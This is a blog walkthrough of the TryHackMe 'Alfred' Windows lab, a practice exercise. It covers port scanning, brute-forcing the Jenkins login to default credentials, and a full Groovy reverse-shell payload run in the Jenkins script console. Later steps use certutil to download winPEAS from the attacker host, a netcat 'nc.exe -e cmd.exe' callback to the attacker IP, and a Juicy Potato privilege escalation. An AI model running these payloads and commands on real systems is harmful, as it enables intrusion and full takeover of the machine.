BLOG

Alfred[Tryhackme]

Feb 27, 2022 | 4 minutes read

Tags: tryhackme, thm, jenkins, PrivEsc, PrivEsc-Windows, Windows-Machine, seImpersonate, Juicy-Potato

Alfred Walkthrough

Scanning

Port Scan

$ nmap -p0-65535 10.10.54.149 -T5
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-29 20:28 IST
Stats: 0:02:46 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Nmap scan report for 10.10.54.149
Host is up (0.16s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
3389/tcp open  ms-wbt-server
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 179.88 seconds

Finding Service Versions

$ nmap -sV -sC -p80,3389,8080 10.10.54.149
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-29 20:36 IST
Nmap scan report for 10.10.54.149
Host is up (0.16s latency).

PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesnot have a title (text/html).
3389/tcp open  ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=alfred
| Not valid before: 2021-06-28T14:38:41
|_Not valid after:  2021-12-28T14:38:41
|_ssl-date: 2021-06-29T15:06:43+00:00; -1s from scanner time.
8080/tcp open  http               Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.52 seconds

Enumeration

80/tcp Microsoft IIS httpd 7.5

There are no Public Exploits for IIS 7.5

Home page

BruceWayne

Let’s Inspect page for any findings

inspectpage

Lets Fuzz for directories

$ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3medium.txt:FUZZ  -u http://10.10.54.149/FUZZ  -t 200 -ic

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.54.149/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 200
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

                        [Status: 200, Size: 289, Words: 18, Lines: 12]
                        [Status: 200, Size: 289, Words: 18, Lines: 12]
:: Progress: [220547/220547] :: Job [1/1] :: 1117 req/sec :: Duration: [0:03:46] :: Errors: 0 ::

There is nothing useful on Port 80

3389/tcp RDP Protocol

We can do BruteForce attacks on RDP.
It may lead to account lockouts.
Lets keep this as last resort.

8080 Jetty 9.4

Home Page

homepage

Inspecting Page

Jenkinsinspect

From the web, we got the default username as admin

Let’s perform bruteforce attack using Burp

burpintruder

Redirection

using one of the password list from seclists, the password is obtained

Password is admin too.

Credential

Exploitation

Using Credentials obtainted during Enumeration stage.

Let’s login to Jenkins. we will be welcomed with below UI

JenkinsLoggedInUI

As we enumerate more on Jenkins UI. We can find Script console in Manage Jenkins

I Tried whoami which is common command for both windows and unix systems.

Which leads to error with groovy as its scripting language.

A quick search engine dorking helped in finding reverse shell for groovy

Payload code:

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Once the payload is twiked and ran in grovy shell. I am greeted with cmd promt

Getting the User flag

Privilege Escalation

By running systeminfo, we got to know the Architecture is 64 bit

systeminfo

Copied winPEAS.exe and winpeas.bat for automated finding of PrivEsc Loopholes

After running them, there is no luck with them

certutil -urlcache -f http://10.14.12.103:8991/winPEASx64.exe winPEASx64.exe

winPeasexe

Powershell not working for me. so tried only winpeas. Powershell - PowerUp.ps1

Using Manual PriveEsc tactics, I found seImpersonate and seDebug Privs

whoami /priv

Using seImpersonate , I made a juicy potato attack

Getting netcat binary to target

netcat1

Creating a batch file for getting shell on our machine

echo "C:\Program Files (x86)\Junkins\nc.exe" -e cmd.exe 10.14.12.103 9186 > priv.bat

privbat

Exexuting the potato attack

j.exe -p "C:\Program Files (x86)\Jenkins\priv.bat" -l 9186 -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020}

{03ca98d6-ff5d-49b8-abc6-03dd84127020} - CLSID, more of them at CLSID

Grabbing the shell

listner

Getting root flag

root

Clean up